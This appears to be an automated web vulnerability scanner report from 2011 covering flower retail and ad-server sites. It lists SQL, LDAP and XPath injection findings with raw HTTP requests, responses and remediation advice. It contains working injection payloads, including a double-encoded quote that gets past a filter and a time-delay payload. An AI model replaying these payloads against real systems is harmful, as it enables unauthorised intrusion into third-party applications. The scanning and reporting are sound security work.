<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>503 Service Unavailable</title>
</head>
<body>
<h1>Error 503 Service Unavailable</h1>
<p>Service Unavailable</p>
<h3>Guru Meditation:</h3>
<p>XID: 729991704</p>
<hr>
<p>Varnish cache server</p>
</body>
</html>

Request 2

GET /pics/counter.gif17406797'%20or%201%3d2--%20?markcode=351 HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=B5E9452E79D710790019CAE77C984B85; TLTUID=B5E9452E79D710790019CAE77C984B85; markcode=351; fsr.a=1304902828764; c1=%7B%22referrer_before_redirect%22%3A%22%22%2C%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D351%5C%22%7D%22%7D; v_id=82914762190364346423402455244690; s_id=68151206806989154919581810926832

Response 2

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Content-Type: text/html
Content-Length: 123191
Date: Mon, 09 May 2011 01:08:34 GMT
X-Varnish: 540338930
Age: 0
Via: 1.1 varnish
Connection: keep-alive



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.com/2008/fbml">
<head>

<link rel="icon" href="http://www.ftd.com/350/favicon.ico" type="image/x-icon" />



   <script language="javascript" type="text/javascript">
   <!--
       var cookie_domain = ".ftd.com";
       // because we modify the document.domain and we have some javascript
       // that references document.domain but expects it to be our actual full domain
       // we save it before we use it.
       var our_domain = document.domain;
       var imageurl = "http://www.ftdimg.com";
       var markcode = "350";
       var js_debug = 0;
       var secure_url = "https://ordering.ftd.com";
       var nonsecure_url = "http://www.ftd.com";
       var seo_urls = 1;
       var isfsenabled = 1;
var isFlorist = 0;
       document.domain = "ftd.com";
   //-->
   </script>


   <script language="javascript" src="http://www.ftdimg.com/v20110407/js/compressed.js"></script>
       <script language="javascript" type="text/javascript">
   <!--
       // we are going to set up a window onerror function
       // this will call our regular try/catch error function
       // this doesn't mean you shouldn't do try/catch blocks, try/catch blocks
       // are actually better then using the window.onerror event.
       try    {
       // now we re-set our onerror function now that errAlert has been defined
       window.onerror=function(message, url, lineNumber) {
        // build our error message from what the onerror event sends us
        var msg = "This error was not in a try/catch block.";
           msg +="\nThe e
...[SNIP]...
1.24. http://xcdn.xgraph.net/17572/ai/xg.gif [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://xcdn.xgraph.net
Path:   /17572/ai/xg.gif

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /17572%2527/ai/xg.gif?pid=17572&sid=12001&type=ai&pcid=home HTTP/1.1
Host: xcdn.xgraph.net
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _xgcid=8C581B03B202A0310D45F935B233EBC0; _xguid=5AB157F7D0512CDEC732624704EA9852; _mpush=A9F8E6728D95BAA8B046FEDC4DCC8AA2

Response 1

HTTP/1.1 500 Internal Server Error
Content-Type: text/html;charset=utf-8
Server: Apache-Coyote/1.1
Content-Length: 1538
Expires: Mon, 09 May 2011 01:01:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 09 May 2011 01:01:06 GMT
Connection: close
Vary: Accept-Encoding
P3P: CP="NOI NID DSP LAW PSAa PSDa OUR BUS UNI COM NAV STA", policyref="http://xcdn.xgraph.net/w3c/p3p.xml"

<html><head><title>Apache Tomcat/6.0.18 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans
...[SNIP]...
</b> Exception report</p>
...[SNIP]...
<pre>java.lang.IllegalStateException
   org.apache.catalina.connector.ResponseFacade.sendRedirect(ResponseFacade.java:435)
   net.netedge.beacon.BeaconServer.deliverAudiencePlacementGif(BeaconServer.java:810)
   net.netedge.beaco
...[SNIP]...
<u>The full stack trace of the root cause is available in the Apache Tomcat/6.0.18 logs.</u>
...[SNIP]...

Request 2

GET /17572%2527%2527/ai/xg.gif?pid=17572&sid=12001&type=ai&pcid=home HTTP/1.1
Host: xcdn.xgraph.net
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _xgcid=8C581B03B202A0310D45F935B233EBC0; _xguid=5AB157F7D0512CDEC732624704EA9852; _mpush=A9F8E6728D95BAA8B046FEDC4DCC8AA2

Response 2

HTTP/1.1 302 Moved Temporarily
Location: http://ib.adnxs.com/seg?add=108023
Server: Apache-Coyote/1.1
Content-Length: 0
Expires: Mon, 09 May 2011 01:01:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 09 May 2011 01:01:06 GMT
Connection: close
Set-Cookie: _push4xgat=1304902866869; Domain=.xgraph.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: _mpush=D82FE5FA7F5F8A72D371134E46D9833; Domain=.xgraph.net; Expires=Thu, 08-May-2014 01:01:06 GMT; Path=/
P3P: CP="NOI NID DSP LAW PSAa PSDa OUR BUS UNI COM NAV STA", policyref="http://xcdn.xgraph.net/w3c/p3p.xml"

2. LDAP injection  previous  next
There are 2 instances of this issue:

Issue background

LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.

Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Issue remediation

If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace.

2.1. http://blooms.1800flowers.com/cm [ci parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://blooms.1800flowers.com
Path:   /cm

Issue detail

The ci parameter appears to be vulnerable to LDAP injection attacks.

The payloads 14e1fc02a2bff0a1)(sn=* and 14e1fc02a2bff0a1)!(sn=* were each submitted in the ci parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /cm?ci=14e1fc02a2bff0a1)(sn=*&st=1304902848067&vn1=4.8.3H&ec=utf-8&vn2=e4.0&pi=w-Welcome%20Page&ul=http%3A%2F%2Fww30.1800flowers.com%2F&tid=6&cg=w&rnd=1304912507230&pc=Y&jv=1.5&np0=Shockwave%2520Flash&np1=Java%2520Deployment%2520Toolkit%25206.0.240.7&np2=Java(TM)%2520Platform%2520SE%25206%2520U24&np3=Silverlight%2520Plug-In&np4=Chrome%2520PDF%2520Viewer&np5=Google%2520Gears%25200.5.33.0&np6=WPI%2520Detector%25201.3&np7=Google%2520Update&np8=Default%2520Plug-in&je=y&sw=1920&sh=1200&pd=16&tz=5&cvdone=p HTTP/1.1
Host: blooms.1800flowers.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; CoreID6=70101304902850161284526; TestSess3=70101304902850161284526

Response 1

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:01:09 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Set-Cookie: 14e1fc02a2bff0a1)(sn=*_login=1304902869001684455414e1fc02a2bff0a1)(sn=*; path=/
Set-Cookie: 14e1fc02a2bff0a1)(sn=*_reset=1304902869;path=/
Expires: Sun, 08 May 2011 07:01:09 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, pre-check=0, post-check=0, private
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,........@..D..;

Request 2

GET /cm?ci=14e1fc02a2bff0a1)!(sn=*&st=1304902848067&vn1=4.8.3H&ec=utf-8&vn2=e4.0&pi=w-Welcome%20Page&ul=http%3A%2F%2Fww30.1800flowers.com%2F&tid=6&cg=w&rnd=1304912507230&pc=Y&jv=1.5&np0=Shockwave%2520Flash&np1=Java%2520Deployment%2520Toolkit%25206.0.240.7&np2=Java(TM)%2520Platform%2520SE%25206%2520U24&np3=Silverlight%2520Plug-In&np4=Chrome%2520PDF%2520Viewer&np5=Google%2520Gears%25200.5.33.0&np6=WPI%2520Detector%25201.3&np7=Google%2520Update&np8=Default%2520Plug-in&je=y&sw=1920&sh=1200&pd=16&tz=5&cvdone=p HTTP/1.1
Host: blooms.1800flowers.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; CoreID6=70101304902850161284526; TestSess3=70101304902850161284526

Response 2

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:01:09 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Set-Cookie: 14e1fc02a2bff0a1)!(sn=*_login=1304902869001684455414e1fc02a2bff0a1)!(sn=*; path=/
Set-Cookie: 14e1fc02a2bff0a1)!(sn=*_reset=1304902869;path=/
Expires: Sun, 08 May 2011 07:01:09 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, pre-check=0, post-check=0, private
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,........@..D..;
2.2. http://www.ftd.com/ [TLTSID cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ftd.com
Path:   /

Issue detail

The TLTSID cookie appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the TLTSID cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET / HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: markcode=351; c1=%7B%22referrer_before_redirect%22%3A%22%22%7D; TLTSID=*)(sn=*; TLTUID=B5E9452E79D710790019CAE77C984B85; fsr.a=1304902822159

Response 1

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Content-Type: text/html
Date: Mon, 09 May 2011 01:02:27 GMT
X-Varnish: 869413438 869395927
Age: 335
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 136169


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...
<script type="text/javascript" language="javascript"> <!-- jQuery(document).ready( function(){ jQuery.getScript("http://www.ftdimg.com/pics/foresee/11-04-17-13-12/foresee-analytics-0eb7e.js"); jQuery.getScript("http://www.ftdimg.com/pics/foresee/11-04-17-13-12/foresee-trigger.js"); } ); //--> </script> <link rel="canonical" href="http://www.ftd.com" />    <script language="javascript" type="text/javascript">
       <!--
       try {
       setCookie('markcode', '351', '', '/', cookie_domain);
       } catch(e) {
           errAlert(e, 'setting markcode cookie in template');
       }
       //-->
       </script>
   
<script type="text/javascript">
<!--//
   var _traffic_dist = '{}';
           try {
               if ( markcode == '350'
                   || markcode == '514'
                   || markcode == '522'
                   || markcode == '528'
                   || markcode == '552'
                   || markcode == '558') {
                   var _sticky_markcodes = '{}';
                   stickyMarkcodeRedirect(_sticky_markcodes, _traffic_dist, 'http://www.ftd.com',1, '', '');
                   } else {
trafficDistribution(_traffic_dist, 'http://www.ftd.com', '', 1, '');
                   }
           } catch(e) {
               errAlert(e, 'trafficDistribution call');
           }
//-->
</script>


   
   <script language="javascript" type="text/javascript">
   <!--
   try {
       } catch(e) {
       errAlert(e, 'cobrand protected site check');
   }
   //-->
   </script>

<!-- start abandon popup code -->
   
<script language='javascript'>
<!--
   var showPopup = true;
   var Yaxis = 0;
   var blurred = false;
   var scart_unloadPopup_override = false;

   var isIE = (navigator.appName.indexOf("Microsoft") != -1);
   var isNav = (navigator.appName.indexOf("Netscape") != -1);
   var isFirefox = (navigator.userAgent.indexOf("Firefox") != -1);

   function unloadPopup(ev) {

/* If we are coming from the empty shopcart page. Thus, if our cart is empty.
           // Then don't show any popups.
           */

        if (scart_unloadPopup_override) {
            return 0;
           }

           var range = screen.height - document.body.offsetHeight;
           if (isIE) {
               ev = window.event;
           }

// kludge
if(!ev
...[SNIP]...

Request 2

GET / HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: markcode=351; c1=%7B%22referrer_before_redirect%22%3A%22%22%7D; TLTSID=*)!(sn=*; TLTUID=B5E9452E79D710790019CAE77C984B85; fsr.a=1304902822159

Response 2

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Content-Type: text/html
Date: Mon, 09 May 2011 01:02:28 GMT
X-Varnish: 729971806 729949891
Age: 416
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 134961


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...
<script type="text/javascript" language="javascript">
<!--
jQuery(document).ready(
function(){
jQuery.getScript("http://www.ftdimg.com/pics/foresee/11-04-17-13-12/foresee-analytics-0eb7e.js");
jQuery.getScript("http://www.ftdimg.com/pics/foresee/11-04-17-13-12/foresee-trigger.js");
}
);
//-->
</script> <link rel="canonical" href="http://www.ftd.com" />    <script language="javascript" type="text/javascript">
       <!--
       try {
       setCookie('markcode', '351', '', '/', cookie_domain);
       } catch(e) {
           errAlert(e, 'setting markcode cookie in template');
       }
       //-->
       </script>
   
<script type="text/javascript">
<!--//
   var _traffic_dist = '{}';
           try {
               if ( markcode == '350'
                   || markcode == '514'
                   || markcode == '522'
                   || markcode == '528'
                   || markcode == '552'
                   || markcode == '558') {
                   var _sticky_markcodes = '{}';
                   stickyMarkcodeRedirect(_sticky_markcodes, _traffic_dist, 'http://www.ftd.com',1, '', '');
                   } else {
trafficDistribution(_traffic_dist, 'http://www.ftd.com', '', 1, '');
                   }
           } catch(e) {
               errAlert(e, 'trafficDistribution call');
           }
//-->
</script>


   
   <script language="javascript" type="text/javascript">
   <!--
   try {
       } catch(e) {
       errAlert(e, 'cobrand protected site check');
   }
   //-->
   </script>

<!-- start abandon popup code -->
   
<script language='javascript'>
<!--
   var showPopup = true;
   var Yaxis = 0;
   var blurred = false;
   var scart_unloadPopup_override = false;

   var isIE = (navigator.appName.indexOf("Microsoft") != -1);
   var isNav = (navigator.appName.indexOf("Netscape") != -1);
   var isFirefox = (navigator.userAgent.indexOf("Firefox") != -1);

   function unloadPopup(ev) {

/* If we are coming from the empty shopcart page. Thus, if our cart is empty.
           // Then don't show any popups.
           */

        if (scart_unloadPopup_override) {
            return 0;
           }

           var range = screen.height - document.body.offsetHeight;
           if (isIE) {
               ev = window.event;
           }

// kludge
if(!ev
...[SNIP]...
3. XPath injection  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The NETID01 cookie appears to be vulnerable to XPath injection attacks. The payload ',0)waitfor%20delay'0%3a0%3a20'-- was submitted in the NETID01 cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Issue background

XPath injection vulnerabilities arise when user-controllable data is incorporated into XPath queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Depending on the purpose for which the vulnerable query is being used, an attacker may be able to exploit an XPath injection flaw to read sensitive application data or interfere with application logic.

Issue remediation

User input should be strictly validated before being incorporated into XPath queries. In most cases, it will be appropriate to accept input containing only short alhanumeric strings. At the very least, input containing any XPath metacharacters such as " ' / @ = * [ ] ( and ) should be rejected.

Request

GET /adserver/ako?activate&type=gif&csid=K10145 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://adsfac.us/pct_mx.asp?L=305606&source=if
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2',0)waitfor%20delay'0%3a0%3a20'--; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4de3dfb9&0&&4dbd04bb&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; udm_0=MLvv9S8pLipr557J8SLcZtVsmYkpAEXfo4IXeAwquSQJS8LV1VT8e1Zf6ZL0ipL7+Kv8z8r9D7fsUFw2wl//IozSp/8YSn4NoHt7l4lq67B2aoTPJY8n/+xt25rkTM9DypP80PyOiYjfBswa/pIttQtABtvQCQc7lE2X5pTLFZly4Ho5X9JogRIv1r4DXxDUgTm31I6TxvuOcKmC/jYW5QMM3ruvTFdWWnnYKoLzU3RqHt1B+4whuE8KiYvSu8fekjRlh6End7IYoakFzgGNwXmFrORt0i1PnlcgwYHAVmdPZXPwfj5PC8fpo6ePf9KPHjtwKnWToMgc1VOatjJzghlFb3uJy+CLp/aBgvIyCGSTh51tY1Rvo4CkU9g/q/BgAxiXtL0sZoKDGnOR57czbWPW2snLVyHjK8qHn9sPGC4471fRIsWCpDXisem0f73E/ZYqkXVnZ4eygMLCHxTcBqIFjqQ0lsGEWtcVVk6WNz4l/Mewn91yb5z3TrGC94Ds0PI7lNEQ/zX+w65QliR9XUWQCR8ZJ0KoPYLJ9vKECY7qypI6JWsG/I/UnSODO2U2xhEoKpLlUINw4H3LIXL7g6gXRfai+Kt4E8gxorg1GKtpOngk4XZcT/94VjxqfHAdrOWtgThQIScl4PM9S4OeVp/AqIwVnD6+9/f77+K5aAauldE+R8qVL3mLN9jE87ZIwkWFl/denYCiK7nCJMMh1mWgtylCdkQLhvem5lL4df6OLCQDdqc2pKs/GXndlZ3eSYBP0hxu1BnT5DxxhgDCxWfzaPkEL58Qj+an9Z2aEd3idnm9kJYYUNJXJ7k1eWZB8XIaWBu+Og4PPbxN05GLrobjeAUr3OiEIqdhdgihq0P409GFU13gTUwlVlsfcu1/EYFLl0DER7k8wuY7faIt3xwOz+kc7xzOK8j7xSKy7XkKoBrIez+xK8rK00qfWaMiid3qLFhWrV7Z0YRVD5Tck40LehukJyUqz+nbRS+1uvi7svDbyhjMyqPcCeWYkKKYfULldUIH1bm8Pcz4+/tvOMe7uidWEFgdWhJeXvxXPLSHRZrYtO9j8Cnaw+R2Jc/MYSEsxo3ftJNSE1AGqd9z1IsgiJ9z5QHadxQxwsqAEgg6YrnJl7ALbsXv8caoArA7zp4fZgZtJCtxWzgclo/7zoUxCFNN/D3OGdAuyZRM4XrAxVRNGqCYmJ96huN4wxe1DAwK7D5sZ6NhmnsBvsQtpyPchz5bXwM1e1FZ05RNiXv3wbRaF4aMDm+j2wVHWV6B43cndwQ8fv7QzGvQMJpqcAx4rw==; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; rsiPus_aQJL="MLsXrlcNJj5noAC3RjxwrYCq5maHIXqV3bcut8jbjWMvRZsh039NS3Rk1DZ9FWcoweu30/kjxwVsyPDJfdB85DH9528gOB025UpRMepjnWmU5D8TIKUOcYbjUmShQ76UQ8O2Id1QrZKunr/oSaJPGUD1M2FfXarUHY3vg8ahPcCT3+YklIOYYWeOEs39aYwMH1Oyzh1cKZm6xWlsnVQK5XeKBwp21ZZle9CNzTsixFNNBKikWDt9n8zOQLOr2R52VBJU62U2bbxqnBQOF3XxuZopXc4sH3ZB08xsgmPeROBLf/pw2JM4T3NBA05x3I7F7WbAB0dj8okxKlhf6fEgxEAZUbMqj6JGIl7P5CAOGFhnHbvUKII41lYc0UedLRqTrY9QebpHRhrHwF3JXBfRoX1F7IMaWwNeWtqQQPBmAEJqR7mpbUrQY5Up8y7EjtHaDOlM3vgpaWsAYiPLvByGKWPmS09u1hcRmQmwQx5N2i7SWd1s9xtLLuXK6F+6bv2iZ8qFE71HT1Kkl+hS/Lg8ZUDNNMYrZPbgIaodojTtwp2b3LGlPywHAt7VDW/DAZuseSIyU4XW5eFPyz1Y6yrhpERI2Vik8hEbsQ8B8v87bEW13Rt13SX+mcaYE5siAUoco0Vq0+dX7hBHmJpHm33cECAnbFJyK50UHkwzt+c2nKU6KGuxY/oigNYJTV/sTm1adr+u7qtftuRwvDTeycarJ5BVmeTth8ruRZ1LgSNT/fpZx8Q4MvMQduiArZ4nRHmKTuHSvs2hGnE7UjfV+u2IOo9ma1WP/A=="; rsi_us_1000000="pUMdIz9HMAYU1O2uQ7bkjytG2HRpKcZ9iWeqPjy9kUWtl6xHCau2KMfgIXcPB8e/BpyfjtTtphAROxiuC83s+lEsRUrjgTlU1Q6ETbocY99WQN8dgTYd2TIldE82taHLaxy+Nydj7bjxqRSEzydoNKcidj8e3cwbw247cKkh0bvF6cW05IwoxL3mn8eGwNjtE8wBzFJ246UcorTvpQmlUzFWkSAdzpSiAiPPsJIE8lbllqVolddNGM9UughUMVmJRRI4QxwiFiwtc6KIkleGTyQORbnreQFdhoy9tIXJDzDUrzQQPFg53TtcFU0IzSRyZT7Ysrwwl1bCknBlQyPjhUJ76l2w0sAMYL8wdNz8+XZcRcYKvvD/UrCKooUt/aj0R6J70YEugNGsaI/NdjyO0otwfzNbegXYLqm4kbsRDLCOaFswANa5kumj+Myz7WFxFbCzByPlnMLG/iRprYhnnkwcpoUb94vjivtXsRNU8sY+9nJ/GyK0btkNncXgdCWK6F6Oq130DYl7qVO7toWR/7nBkQRQIHLYme9RaVkdGxQWzXlbDG+28P2rHEEKz1Jjq3MinipUFDb/X+skn0RAc5T2sv30M4M6SF5um2GeWtPGlm5/Kb7BBThW/rN4hbbJoIkTzsbd8cjyEyF0/6eY8Ql2WYO/ugwtD3KZKjg5FVoYYefZZL5FOyh5daP5P/acL+xvjHz+q/GKm+7UEbKgyi9riSc6BmVdwLpaoKChjgmndfydm9Rp55qJhAVzniaZx4ZfHgIJVo9ZqKvelViCz7jBcU+V22aO+QATsHM3O7khIxKxUpkTaNd2kuV2SDDKynS7pV755LqyKqSMIL9wDkqmG7I+PrM991cy7UOrI9CvhRsR0dGASBwDlIzEsz74PHZLjOOmhUndtuC+D9t3Pq9su4Qx5Gs+t+I1W2txXTMTAcv2+R94m2kL+BDy7SPgGZGE0LncHJN7qYordxYyuPDkLDO+RTaY+dG9ss66V7iVeW1Vpey8S0+SwK+SzonThNqM/B2m/bV6ZSXYt/prvJB/MoIZP7SVL30KjWZ5/nCFvqlj310LdQdx0sQ7a5cozfA89Wdmx6jAkGQrp47QDxo74bzIxU7oFU3eB48wpYTTqzPon/N/QOCsyy2tlb0vJptzVJDknJSV4Q5JHz84YjU8xY+F+7133qycHPNZitpdKfZe0t1RvmPf+XiCaa8BsDly/gBuN8TvoXnO8CAEwaesRAiFwcVqRagT7jCCmYzHi3EpHSIU6iFVXHlFHEhbdShbrC6g1B1Dr34GmQRkEjan4C1Evhax4yYJfFg/As+UsUZxBW0pXt5DzJCs/6I4Jli5U0q36mqAAXwqUxTeVjFtUsmZcR5liY8B3SY9pZ48EVHSp+luF/CLoxOj2+gMyXe3zIStYnrdo0U="; 